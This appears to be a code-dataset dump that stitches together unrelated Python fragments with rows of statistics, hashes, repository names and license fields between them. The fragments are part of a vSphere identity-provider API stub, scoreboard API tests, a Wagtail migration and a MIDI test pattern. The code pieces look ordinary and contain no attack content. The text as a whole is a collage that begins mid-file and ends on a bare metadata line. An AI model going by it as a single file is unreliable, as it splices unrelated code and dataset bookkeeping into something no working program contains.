The arguments are used to initialize data attributes with the same
names.
"""
def __init__(self,
discovery_endpoint=None,
client_id=None,
client_secret=None,
claim_map=None,
):
"""
:type discovery_endpoint: :class:`str` or ``None``
:param discovery_endpoint: Endpoint to retrieve the provider metadata. This attribute was
added in vSphere API 7.0.0.
If None, leaves value unchanged.
:type client_id: :class:`str` or ``None``
:param client_id: Client identifier to connect to the provider. This attribute was
added in vSphere API 7.0.0.
If None, leaves value unchanged.
:type client_secret: :class:`str` or ``None``
:param client_secret: The secret shared between the client and the provider. This
attribute was added in vSphere API 7.0.0.
If None, leaves value unchanged.
:type claim_map: (:class:`dict` of :class:`str` and (:class:`dict` of :class:`str` and :class:`list` of :class:`str`)) or ``None``
:param claim_map: The map used to transform an OAuth2 claim to a corresponding claim
that vCenter Server understands. Currently only the key "perms" is
supported. The key "perms" is used for mapping the "perms" claim of
incoming JWT. The value is another map with an external group as
the key and a vCenter Server group as value. This attribute was
added in vSphere API 7.0.0.
If None, leaves value unchanged.
"""
self.discovery_endpoint = discovery_endpoint
self.client_id = client_id
self.client_secret = client_secret
self.claim_map = claim_map
VapiStruct.__init__(self)
OidcUpdateSpec._set_binding_type(type.StructType(
'com.vmware.vcenter.identity.providers.oidc_update_spec', {
'discovery_endpoint': type.OptionalType(type.URIType()),
'client_id': type.OptionalType(type.StringType()),
'client_secret': type.OptionalType(type.StringType()),
'claim_map': type.OptionalType(type.MapType(type.StringType(), type.MapType(type.StringType(), type.ListType(type.StringType())))),
},
OidcUpdateSpec,
False,
None))
class ActiveDirectoryOverLdap(VapiStruct):
"""
The ``Providers.ActiveDirectoryOverLdap`` class contains the information
about to how to use an Active Directory over LDAP connection to allow
searching for users and groups if the identity provider is an On-Prem
service. This class was added in vSphere API 7.0.0.
.. tip::
The arguments are used to initialize data attributes with the same
names.
"""
def __init__(self,
user_name=None,
password=None,
users_base_dn=None,
groups_base_dn=None,
server_endpoints=None,
cert_chain=None,
):
"""
:type user_name: :class:`str`
:param user_name: User name to connect to the active directory server. This attribute
was added in vSphere API 7.0.0.
:type password: :class:`str`
:param password: Password to connect to the active directory server. This attribute
was added in vSphere API 7.0.0.
:type users_base_dn: :class:`str`
:param users_base_dn: Base distinguished name for users. This attribute was added in
vSphere API 7.0.0.
:type groups_base_dn: :class:`str`
:param groups_base_dn: Base distinguished name for groups. This attribute was added in
vSphere API 7.0.0.
:type server_endpoints: :class:`list` of :class:`str`
:param server_endpoints: Active directory server endpoints. At least one active directory
server endpoint must be set. This attribute was added in vSphere
API 7.0.0.
:type cert_chain: :class:`com.vmware.vcenter.certificate_management_client.X509CertChain` or ``None``
:param cert_chain: SSL certificate chain in base64 encoding. This attribute was added
in vSphere API 7.0.0.
This attribute can be None only, if all the active directory server
endpoints use the LDAP (not LDAPS) protocol.
"""
self.user_name = user_name
self.password = password
self.users_base_dn = users_base_dn
self.groups_base_dn = groups_base_dn
self.server_endpoints = server_endpoints
self.cert_chain = cert_chain
VapiStruct.__init__(self)
ActiveDirectoryOverLdap._set_binding_type(type.StructType(
'com.vmware.vcenter.identity.providers.active_directory_over_ldap', {
'user_name': type.StringType(),
'password': type.SecretType(),
'users_base_dn': type.StringType(),
'groups_base_dn': type.StringType(),
'server_endpoints': type.ListType(type.URIType()),
'cert_chain': type.OptionalType(type.ReferenceType('com.vmware.vcenter.certificate_management_client', 'X509CertChain')),
},
ActiveDirectoryOverLdap,
False,
None))
def list(self):
"""
Retrieve all identity providers. This method was added in vSphere API
7.0.0.
:rtype: :class:`list` of :class:`Providers.Summary`
:return: Commonly used information about the identity providers.
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
if authorization is not given to caller.
"""
return self._invoke('list', None)
def get(self,
provider,
):
"""
Retrieve detailed information of the specified identity provider. This
method was added in vSphere API 7.0.0.
:type provider: :class:`str`
:param provider: the identifier of the provider
The parameter must be an identifier for the resource type:
``com.vmware.vcenter.identity.Providers``.
:rtype: :class:`Providers.Info`
:return: Detailed information of the specified identity provider.
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
if authorization is not given to caller.
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
if no provider found with the given provider identifier.
"""
return self._invoke('get',
{
'provider': provider,
})
def create(self,
spec,
):
"""
Create a vCenter Server identity provider. This method was added in
vSphere API 7.0.0.
:type spec: :class:`Providers.CreateSpec`
:param spec: the CreateSpec contains the information used to create the provider
:rtype: :class:`str`
:return: The identifier of the created identity provider.
The return value will be an identifier for the resource type:
``com.vmware.vcenter.identity.Providers``.
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
if authorization is not given to caller.
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidArgument`
if invalid arguments are provided in createSpec.
"""
return self._invoke('create',
{
'spec': spec,
})
def update(self,
provider,
spec,
):
"""
Update a vCenter Server identity provider. This method was added in
vSphere API 7.0.0.
:type provider: :class:`str`
:param provider: the identifier of the provider to update
The parameter must be an identifier for the resource type:
``com.vmware.vcenter.identity.Providers``.
:type spec: :class:`Providers.UpdateSpec`
:param spec: the UpdateSpec contains the information used to update the provider
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
if authorization is not given to caller.
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidArgument`
if invalid arguments are provided in updateSpec.
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
if no provider found with the given provider identifier.
"""
return self._invoke('update',
{
'provider': provider,
'spec': spec,
})
def delete(self,
provider,
):
"""
Delete a vCenter Server identity provider. This method was added in
vSphere API 7.0.0.
:type provider: :class:`str`
:param provider: the identifier of the provider to delete
The parameter must be an identifier for the resource type:
``com.vmware.vcenter.identity.Providers``.
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
if authorization is not given to caller.
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
if no provider found with the given provider identifier.
"""
return self._invoke('delete',
{
'provider': provider,
})
class _ProvidersStub(ApiInterfaceStub):
def __init__(self, config):
# properties for list operation
list_input_type = type.StructType('operation-input', {})
list_error_dict = {
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
}
list_input_value_validator_list = [
]
list_output_validator_list = [
]
list_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/vcenter/identity/providers',
path_variables={
},
query_parameters={
}
)
# properties for get operation
get_input_type = type.StructType('operation-input', {
'provider': type.IdType(resource_types='com.vmware.vcenter.identity.Providers'),
})
get_error_dict = {
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
get_input_value_validator_list = [
]
get_output_validator_list = [
]
get_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/vcenter/identity/providers/{providerid}',
path_variables={
'provider': 'providerid',
},
query_parameters={
}
)
# properties for create operation
create_input_type = type.StructType('operation-input', {
'spec': type.ReferenceType(__name__, 'Providers.CreateSpec'),
})
create_error_dict = {
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.invalid_argument':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidArgument'),
}
create_input_value_validator_list = [
]
create_output_validator_list = [
]
create_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/vcenter/identity/providers',
path_variables={
},
query_parameters={
}
)
# properties for update operation
update_input_type = type.StructType('operation-input', {
'provider': type.IdType(resource_types='com.vmware.vcenter.identity.Providers'),
'spec': type.ReferenceType(__name__, 'Providers.UpdateSpec'),
})
update_error_dict = {
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.invalid_argument':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidArgument'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
update_input_value_validator_list = [
]
update_output_validator_list = [
]
update_rest_metadata = OperationRestMetadata(
http_method='PATCH',
url_template='/vcenter/identity/providers/{providerid}',
path_variables={
'provider': 'providerid',
},
query_parameters={
}
)
# properties for delete operation
delete_input_type = type.StructType('operation-input', {
'provider': type.IdType(resource_types='com.vmware.vcenter.identity.Providers'),
})
delete_error_dict = {
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
delete_input_value_validator_list = [
]
delete_output_validator_list = [
]
delete_rest_metadata = OperationRestMetadata(
http_method='DELETE',
url_template='/vcenter/identity/providers/{providerid}',
path_variables={
'provider': 'providerid',
},
query_parameters={
}
)
operations = {
'list': {
'input_type': list_input_type,
'output_type': type.ListType(type.ReferenceType(__name__, 'Providers.Summary')),
'errors': list_error_dict,
'input_value_validator_list': list_input_value_validator_list,
'output_validator_list': list_output_validator_list,
'task_type': TaskType.NONE,
},
'get': {
'input_type': get_input_type,
'output_type': type.ReferenceType(__name__, 'Providers.Info'),
'errors': get_error_dict,
'input_value_validator_list': get_input_value_validator_list,
'output_validator_list': get_output_validator_list,
'task_type': TaskType.NONE,
},
'create': {
'input_type': create_input_type,
'output_type': type.IdType(resource_types='com.vmware.vcenter.identity.Providers'),
'errors': create_error_dict,
'input_value_validator_list': create_input_value_validator_list,
'output_validator_list': create_output_validator_list,
'task_type': TaskType.NONE,
},
'update': {
'input_type': update_input_type,
'output_type': type.VoidType(),
'errors': update_error_dict,
'input_value_validator_list': update_input_value_validator_list,
'output_validator_list': update_output_validator_list,
'task_type': TaskType.NONE,
},
'delete': {
'input_type': delete_input_type,
'output_type': type.VoidType(),
'errors': delete_error_dict,
'input_value_validator_list': delete_input_value_validator_list,
'output_validator_list': delete_output_validator_list,
'task_type': TaskType.NONE,
},
}
rest_metadata = {
'list': list_rest_metadata,
'get': get_rest_metadata,
'create': create_rest_metadata,
'update': update_rest_metadata,
'delete': delete_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.vcenter.identity.providers',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=True)
class StubFactory(StubFactoryBase):
_attrs = {
'Providers': Providers,
}
| 48.379205 | 143 | 0.591129 | 10,856 | 94,920 | 5.043755 | 0.045505 | 0.022792 | 0.028491 | 0.044708 | 0.859246 | 0.842699 | 0.822044 | 0.800438 | 0.792896 | 0.791033 | 0 | 0.009252 | 0.332733 | 94,920 | 1,961 | 144 | 48.403876 | 0.85525 | 0.500358 | 0 | 0.614702 | 1 | 0 | 0.153018 | 0.085632 | 0 | 0 | 0 | 0 | 0 | 1 | 0.029151 | false | 0.003802 | 0.015209 | 0 | 0.077313 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
8153be1cf1ec491ee143c6bfe75efe07cb326fe1 | 13,504 | py | Python | py_ball/tests/test_scoreboard.py | avyayv/py_ball | d90ebd30af9d5405846fa5db5a0525a592543872 | [
"MIT"
] | 70 | 2019-01-30T17:41:29.000Z | 2022-03-27T16:18:32.000Z | py_ball/tests/test_scoreboard.py | avyayv/py_ball | d90ebd30af9d5405846fa5db5a0525a592543872 | [
"MIT"
] | 6 | 2019-09-21T01:58:05.000Z | 2020-08-08T20:02:28.000Z | py_ball/tests/test_scoreboard.py | avyayv/py_ball | d90ebd30af9d5405846fa5db5a0525a592543872 | [
"MIT"
] | 16 | 2019-05-26T04:04:57.000Z | 2022-03-27T16:18:35.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Dec 23 21:54:48 2018
@author: patrickmcfarlane
test_scoreboard.py
This function contains the tests for
functions in the scoreboard.py file
"""
import time
from .__init__ import HEADERS
from ..scoreboard import ScoreBoard
def test_scoreboard():
""" tests the scoreboard endpoint of the ScoreBoard class
"""
time.sleep(1)
example_board = ScoreBoard(headers=HEADERS,
game_date='12/22/2018')
table_names = example_board.data.keys()
assert 'GameHeader' in table_names
assert 'LineScore' in table_names
assert 'SeriesStandings' in table_names
assert 'LastMeeting' in table_names
assert 'EastConfStandingsByDay' in table_names
assert 'WestConfStandingsByDay' in table_names
assert 'Available' in table_names
example_game = example_board.data['GameHeader'][0]
example_line = example_board.data['LineScore'][0]
example_series = example_board.data['SeriesStandings'][0]
example_last = example_board.data['LastMeeting'][0]
example_east = example_board.data['EastConfStandingsByDay'][0]
example_west = example_board.data['WestConfStandingsByDay'][0]
example_avail = example_board.data['Available'][0]
assert list(example_game.keys()) == ['GAME_DATE_EST',
'GAME_SEQUENCE',
'GAME_ID',
'GAME_STATUS_ID',
'GAME_STATUS_TEXT',
'GAMECODE',
'HOME_TEAM_ID',
'VISITOR_TEAM_ID',
'SEASON',
'LIVE_PERIOD',
'LIVE_PC_TIME',
'NATL_TV_BROADCASTER_ABBREVIATION',
'LIVE_PERIOD_TIME_BCAST',
'WH_STATUS']
assert list(example_line.keys()) == ['GAME_DATE_EST',
'GAME_SEQUENCE',
'GAME_ID',
'TEAM_ID',
'TEAM_ABBREVIATION',
'TEAM_CITY_NAME',
'TEAM_WINS_LOSSES',
'PTS_QTR1',
'PTS_QTR2',
'PTS_QTR3',
'PTS_QTR4',
'PTS_OT1',
'PTS_OT2',
'PTS_OT3',
'PTS_OT4',
'PTS_OT5',
'PTS_OT6',
'PTS_OT7',
'PTS_OT8',
'PTS_OT9',
'PTS_OT10',
'PTS',
'FG_PCT',
'FT_PCT',
'FG3_PCT',
'AST',
'REB',
'TOV']
assert list(example_series.keys()) == ['GAME_ID',
'HOME_TEAM_ID',
'VISITOR_TEAM_ID',
'GAME_DATE_EST',
'HOME_TEAM_WINS',
'HOME_TEAM_LOSSES',
'SERIES_LEADER']
assert list(example_last.keys()) == ['GAME_ID',
'LAST_GAME_ID',
'LAST_GAME_DATE_EST',
'LAST_GAME_HOME_TEAM_ID',
'LAST_GAME_HOME_TEAM_CITY',
'LAST_GAME_HOME_TEAM_NAME',
'LAST_GAME_HOME_TEAM_ABBREVIATION',
'LAST_GAME_HOME_TEAM_POINTS',
'LAST_GAME_VISITOR_TEAM_ID',
'LAST_GAME_VISITOR_TEAM_CITY',
'LAST_GAME_VISITOR_TEAM_NAME',
'LAST_GAME_VISITOR_TEAM_CITY1',
'LAST_GAME_VISITOR_TEAM_POINTS']
assert list(example_east.keys()) == ['TEAM_ID',
'LEAGUE_ID',
'SEASON_ID',
'STANDINGSDATE',
'CONFERENCE',
'TEAM',
'G',
'W',
'L',
'W_PCT',
'HOME_RECORD',
'ROAD_RECORD']
assert list(example_west.keys()) == ['TEAM_ID',
'LEAGUE_ID',
'SEASON_ID',
'STANDINGSDATE',
'CONFERENCE',
'TEAM',
'G',
'W',
'L',
'W_PCT',
'HOME_RECORD',
'ROAD_RECORD']
assert list(example_avail.keys()) == ['GAME_ID', 'PT_AVAILABLE']
def test_scoreboardv2():
""" tests the scoreboardv2 endpoint of the ScoreBoard class
"""
time.sleep(1)
example_board = ScoreBoard(headers=HEADERS,
endpoint='scoreboardv2',
game_date='12/22/2018')
table_names = example_board.data.keys()
assert 'GameHeader' in table_names
assert 'LineScore' in table_names
assert 'SeriesStandings' in table_names
assert 'LastMeeting' in table_names
assert 'EastConfStandingsByDay' in table_names
assert 'WestConfStandingsByDay' in table_names
assert 'Available' in table_names
assert 'TeamLeaders' in table_names
assert 'TicketLinks' in table_names
assert 'WinProbability' in table_names
example_game = example_board.data['GameHeader'][0]
example_line = example_board.data['LineScore'][0]
example_series = example_board.data['SeriesStandings'][0]
example_last = example_board.data['LastMeeting'][0]
example_east = example_board.data['EastConfStandingsByDay'][0]
example_west = example_board.data['WestConfStandingsByDay'][0]
example_avail = example_board.data['Available'][0]
example_lead = example_board.data['TeamLeaders'][0]
example_tick = example_board.data['TicketLinks'][0]
assert list(example_game.keys()) == ['GAME_DATE_EST',
'GAME_SEQUENCE',
'GAME_ID',
'GAME_STATUS_ID',
'GAME_STATUS_TEXT',
'GAMECODE',
'HOME_TEAM_ID',
'VISITOR_TEAM_ID',
'SEASON',
'LIVE_PERIOD',
'LIVE_PC_TIME',
'NATL_TV_BROADCASTER_ABBREVIATION',
'HOME_TV_BROADCASTER_ABBREVIATION',
'AWAY_TV_BROADCASTER_ABBREVIATION',
'LIVE_PERIOD_TIME_BCAST',
'ARENA_NAME',
'WH_STATUS']
assert list(example_line.keys()) == ['GAME_DATE_EST',
'GAME_SEQUENCE',
'GAME_ID',
'TEAM_ID',
'TEAM_ABBREVIATION',
'TEAM_CITY_NAME',
'TEAM_NAME',
'TEAM_WINS_LOSSES',
'PTS_QTR1',
'PTS_QTR2',
'PTS_QTR3',
'PTS_QTR4',
'PTS_OT1',
'PTS_OT2',
'PTS_OT3',
'PTS_OT4',
'PTS_OT5',
'PTS_OT6',
'PTS_OT7',
'PTS_OT8',
'PTS_OT9',
'PTS_OT10',
'PTS',
'FG_PCT',
'FT_PCT',
'FG3_PCT',
'AST',
'REB',
'TOV']
assert list(example_series.keys()) == ['GAME_ID',
'HOME_TEAM_ID',
'VISITOR_TEAM_ID',
'GAME_DATE_EST',
'HOME_TEAM_WINS',
'HOME_TEAM_LOSSES',
'SERIES_LEADER']
assert list(example_last.keys()) == ['GAME_ID',
'LAST_GAME_ID',
'LAST_GAME_DATE_EST',
'LAST_GAME_HOME_TEAM_ID',
'LAST_GAME_HOME_TEAM_CITY',
'LAST_GAME_HOME_TEAM_NAME',
'LAST_GAME_HOME_TEAM_ABBREVIATION',
'LAST_GAME_HOME_TEAM_POINTS',
'LAST_GAME_VISITOR_TEAM_ID',
'LAST_GAME_VISITOR_TEAM_CITY',
'LAST_GAME_VISITOR_TEAM_NAME',
'LAST_GAME_VISITOR_TEAM_CITY1',
'LAST_GAME_VISITOR_TEAM_POINTS']
assert list(example_east.keys()) == ['TEAM_ID',
'LEAGUE_ID',
'SEASON_ID',
'STANDINGSDATE',
'CONFERENCE',
'TEAM',
'G',
'W',
'L',
'W_PCT',
'HOME_RECORD',
'ROAD_RECORD']
assert list(example_west.keys()) == ['TEAM_ID',
'LEAGUE_ID',
'SEASON_ID',
'STANDINGSDATE',
'CONFERENCE',
'TEAM',
'G',
'W',
'L',
'W_PCT',
'HOME_RECORD',
'ROAD_RECORD']
assert list(example_avail.keys()) == ['GAME_ID', 'PT_AVAILABLE']
assert list(example_lead.keys()) == ['GAME_ID',
'TEAM_ID',
'TEAM_CITY',
'TEAM_NICKNAME',
'TEAM_ABBREVIATION',
'PTS_PLAYER_ID',
'PTS_PLAYER_NAME',
'PTS',
'REB_PLAYER_ID',
'REB_PLAYER_NAME',
'REB',
'AST_PLAYER_ID',
'AST_PLAYER_NAME',
'AST']
assert list(example_tick.keys()) == ['GAME_ID', 'LEAG_TIX']
| 47.382456 | 76 | 0.33005 | 847 | 13,504 | 4.850059 | 0.160567 | 0.046738 | 0.070107 | 0.065725 | 0.834469 | 0.830574 | 0.830574 | 0.815239 | 0.815239 | 0.815239 | 0 | 0.015677 | 0.598489 | 13,504 | 284 | 77 | 47.549296 | 0.741977 | 0.023697 | 0 | 0.891667 | 0 | 0 | 0.204817 | 0.06655 | 0 | 0 | 0 | 0 | 0.1375 | 1 | 0.008333 | false | 0 | 0.0125 | 0 | 0.020833 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
8181e3db139c2e5c0b21b3d1bfadbba775c1da98 | 1,666 | py | Python | tools/migrations/0002_auto_20191218_1535.py | IATI/new-website | b90783e32d19ac4c821c5ea018a52997a11b5286 | [
"MIT"
] | 4 | 2019-03-28T06:42:17.000Z | 2021-06-06T13:10:51.000Z | tools/migrations/0002_auto_20191218_1535.py | IATI/new-website | b90783e32d19ac4c821c5ea018a52997a11b5286 | [
"MIT"
] | 177 | 2018-09-28T14:21:56.000Z | 2022-03-30T21:45:26.000Z | tools/migrations/0002_auto_20191218_1535.py | IATI/new-website | b90783e32d19ac4c821c5ea018a52997a11b5286 | [
"MIT"
] | 8 | 2018-10-25T20:43:10.000Z | 2022-03-17T14:19:27.000Z | # Generated by Django 2.0.12 on 2019-12-18 15:35
from django.db import migrations
import wagtail.core.fields
class Migration(migrations.Migration):
dependencies = [
('tools', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='toolslistingpage',
name='highlight_content',
field=wagtail.core.fields.RichTextField(blank=True, help_text='Optional: content for the highlight panel displayed after featured tools'),
),
migrations.AlterField(
model_name='toolslistingpage',
name='highlight_content_en',
field=wagtail.core.fields.RichTextField(blank=True, help_text='Optional: content for the highlight panel displayed after featured tools', null=True),
),
migrations.AlterField(
model_name='toolslistingpage',
name='highlight_content_es',
field=wagtail.core.fields.RichTextField(blank=True, help_text='Optional: content for the highlight panel displayed after featured tools', null=True),
),
migrations.AlterField(
model_name='toolslistingpage',
name='highlight_content_fr',
field=wagtail.core.fields.RichTextField(blank=True, help_text='Optional: content for the highlight panel displayed after featured tools', null=True),
),
migrations.AlterField(
model_name='toolslistingpage',
name='highlight_content_pt',
field=wagtail.core.fields.RichTextField(blank=True, help_text='Optional: content for the highlight panel displayed after featured tools', null=True),
),
]
| 41.65 | 161 | 0.667467 | 177 | 1,666 | 6.169492 | 0.276836 | 0.06044 | 0.093407 | 0.132784 | 0.848901 | 0.848901 | 0.848901 | 0.848901 | 0.729853 | 0.729853 | 0 | 0.015723 | 0.236495 | 1,666 | 39 | 162 | 42.717949 | 0.842767 | 0.027611 | 0 | 0.575758 | 1 | 0 | 0.342398 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.060606 | 0 | 0.151515 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
8184373c1279f1f5b58ba81254b74b7fb7383cd7 | 4,249 | py | Python | tests/mary_test.py | m2march/python-midi | d8c41af7e28ed5f2952616b93e0331070d22f9bf | [
"MIT"
] | 1,344 | 2015-01-17T18:11:42.000Z | 2022-03-24T08:42:47.000Z | tests/mary_test.py | m2march/python-midi | d8c41af7e28ed5f2952616b93e0331070d22f9bf | [
"MIT"
] | 130 | 2015-01-11T09:25:53.000Z | 2022-01-16T17:54:24.000Z | tests/mary_test.py | m2march/python-midi | d8c41af7e28ed5f2952616b93e0331070d22f9bf | [
"MIT"
] | 403 | 2015-01-06T21:37:06.000Z | 2022-03-31T21:07:43.000Z | import midi
MARY_MIDI = midi.Pattern(tracks=[[midi.TimeSignatureEvent(tick=0, data=[4, 2, 24, 8]),
midi.KeySignatureEvent(tick=0, data=[0, 0]),
midi.EndOfTrackEvent(tick=1, data=[])],
[midi.ControlChangeEvent(tick=0, channel=0, data=[91, 58]),
midi.ControlChangeEvent(tick=0, channel=0, data=[10, 69]),
midi.ControlChangeEvent(tick=0, channel=0, data=[0, 0]),
midi.ControlChangeEvent(tick=0, channel=0, data=[32, 0]),
midi.ProgramChangeEvent(tick=0, channel=0, data=[24]),
midi.NoteOnEvent(tick=0, channel=0, data=[64, 72]),
midi.NoteOnEvent(tick=0, channel=0, data=[55, 70]),
midi.NoteOnEvent(tick=231, channel=0, data=[64, 0]),
midi.NoteOnEvent(tick=25, channel=0, data=[62, 72]),
midi.NoteOnEvent(tick=231, channel=0, data=[62, 0]),
midi.NoteOnEvent(tick=25, channel=0, data=[60, 71]),
midi.NoteOnEvent(tick=231, channel=0, data=[60, 0]),
midi.NoteOnEvent(tick=25, channel=0, data=[62, 79]),
midi.NoteOnEvent(tick=206, channel=0, data=[55, 0]),
midi.NoteOnEvent(tick=25, channel=0, data=[62, 0]),
midi.NoteOnEvent(tick=25, channel=0, data=[64, 85]),
midi.NoteOnEvent(tick=0, channel=0, data=[55, 79]),
midi.NoteOnEvent(tick=231, channel=0, data=[64, 0]),
midi.NoteOnEvent(tick=25, channel=0, data=[64, 78]),
midi.NoteOnEvent(tick=231, channel=0, data=[64, 0]),
midi.NoteOnEvent(tick=25, channel=0, data=[64, 74]),
midi.NoteOnEvent(tick=462, channel=0, data=[55, 0]),
midi.NoteOnEvent(tick=0, channel=0, data=[64, 0]),
midi.NoteOnEvent(tick=50, channel=0, data=[62, 75]),
midi.NoteOnEvent(tick=0, channel=0, data=[55, 77]),
midi.NoteOnEvent(tick=231, channel=0, data=[62, 0]),
midi.NoteOnEvent(tick=25, channel=0, data=[62, 77]),
midi.NoteOnEvent(tick=231, channel=0, data=[62, 0]),
midi.NoteOnEvent(tick=25, channel=0, data=[62, 75]),
midi.NoteOnEvent(tick=462, channel=0, data=[55, 0]),
midi.NoteOnEvent(tick=0, channel=0, data=[62, 0]),
midi.NoteOnEvent(tick=50, channel=0, data=[64, 82]),
midi.NoteOnEvent(tick=0, channel=0, data=[55, 79]),
midi.NoteOnEvent(tick=231, channel=0, data=[64, 0]),
midi.NoteOnEvent(tick=25, channel=0, data=[67, 84]),
midi.NoteOnEvent(tick=231, channel=0, data=[67, 0]),
midi.NoteOnEvent(tick=25, channel=0, data=[67, 75]),
midi.NoteOnEvent(tick=462, channel=0, data=[55, 0]),
midi.NoteOnEvent(tick=0, channel=0, data=[67, 0]),
midi.NoteOnEvent(tick=50, channel=0, data=[64, 73]),
midi.NoteOnEvent(tick=0, channel=0, data=[55, 78]),
midi.NoteOnEvent(tick=231, channel=0, data=[64, 0]),
midi.NoteOnEvent(tick=25, channel=0, data=[62, 69]),
midi.NoteOnEvent(tick=231, channel=0, data=[62, 0]),
midi.NoteOnEvent(tick=25, channel=0, data=[60, 71]),
midi.NoteOnEvent(tick=231, channel=0, data=[60, 0]),
midi.NoteOnEvent(tick=25, channel=0, data=[62, 80]),
midi.NoteOnEvent(tick=206, channel=0, data=[55, 0]),
midi.NoteOnEvent(tick=25, channel=0, data=[62, 0]),
midi.NoteOnEvent(tick=25, channel=0, data=[64, 84]),
midi.NoteOnEvent(tick=0, channel=0, data=[55, 79]),
midi.NoteOnEvent(tick=231, channel=0, data=[64, 0]),
midi.NoteOnEvent(tick=25, channel=0, data=[64, 76]),
midi.NoteOnEvent(tick=231, channel=0, data=[64, 0]),
midi.NoteOnEvent(tick=25, channel=0, data=[64, 74]),
midi.NoteOnEvent(tick=231, channel=0, data=[64, 0]),
midi.NoteOnEvent(tick=25, channel=0, data=[64, 77]),
midi.NoteOnEvent(tick=206, channel=0, data=[55, 0]),
midi.NoteOnEvent(tick=25, channel=0, data=[64, 0]),
midi.NoteOnEvent(tick=25, channel=0, data=[62, 75]),
midi.NoteOnEvent(tick=0, channel=0, data=[55, 78]),
midi.NoteOnEvent(tick=231, channel=0, data=[62, 0]),
midi.NoteOnEvent(tick=25, channel=0, data=[62, 74]),
midi.NoteOnEvent(tick=231, channel=0, data=[62, 0]),
midi.NoteOnEvent(tick=25, channel=0, data=[64, 81]),
midi.NoteOnEvent(tick=231, channel=0, data=[64, 0]),
midi.NoteOnEvent(tick=25, channel=0, data=[62, 70]),
midi.NoteOnEvent(tick=206, channel=0, data=[55, 0]),
midi.NoteOnEvent(tick=25, channel=0, data=[62, 0]),
midi.NoteOnEvent(tick=25, channel=0, data=[60, 73]),
midi.NoteOnEvent(tick=0, channel=0, data=[52, 72]),
midi.NoteOnEvent(tick=974, channel=0, data=[60, 0]),
midi.NoteOnEvent(tick=0, channel=0, data=[52, 0]),
midi.EndOfTrackEvent(tick=1, data=[])]])
| 53.1125 | 86 | 0.674276 | 689 | 4,249 | 4.156749 | 0.075472 | 0.130936 | 0.305866 | 0.230447 | 0.936103 | 0.927374 | 0.907123 | 0.844972 | 0.775489 | 0.737081 | 0 | 0.129551 | 0.108025 | 4,249 | 79 | 87 | 53.78481 | 0.626121 | 0 | 0 | 0.487179 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.012821 | 0 | 0.012821 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
8184e3e37f2f386524fbce6702c996b4e91b6641 | 280 | py | Python | hw_asr/metric/utils.py | Misha24-10/asr_project_template | f5fbda4e215edb048c02d5e0c2ce1ba9c7804b02 | [
"MIT"
] | 1 | 2021-10-06T13:08:29.000Z | 2021-10-06T13:08:29.000Z | hw_asr/metric/utils.py | Misha24-10/asr_project_template | f5fbda4e215edb048c02d5e0c2ce1ba9c7804b02 | [
"MIT"
] | 1 | 2021-10-10T21:38:51.000Z | 2021-10-11T21:36:48.000Z | hw_asr/metric/utils.py | Misha24-10/asr_project_template | f5fbda4e215edb048c02d5e0c2ce1ba9c7804b02 | [
"MIT"
